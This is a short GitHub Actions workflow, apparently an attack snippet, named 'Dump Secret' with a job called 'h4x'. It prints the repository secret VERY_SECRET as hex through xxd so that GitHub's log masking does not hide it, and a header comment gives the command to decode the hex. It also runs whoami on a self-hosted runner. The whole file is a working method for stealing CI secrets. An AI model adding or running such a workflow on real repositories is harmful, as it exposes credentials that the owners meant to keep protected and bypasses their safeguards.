# decode with:
# echo $string | xxd -r -ps
name: Dump Secret
on:
  workflow_dispatch:

jobs:
  h4x:
    runs-on: ops
    steps:
      - name: Dump s3cr3t
        run: whoami && echo -n "${{ secrets.VERY_SECRET }}" | xxd -ps
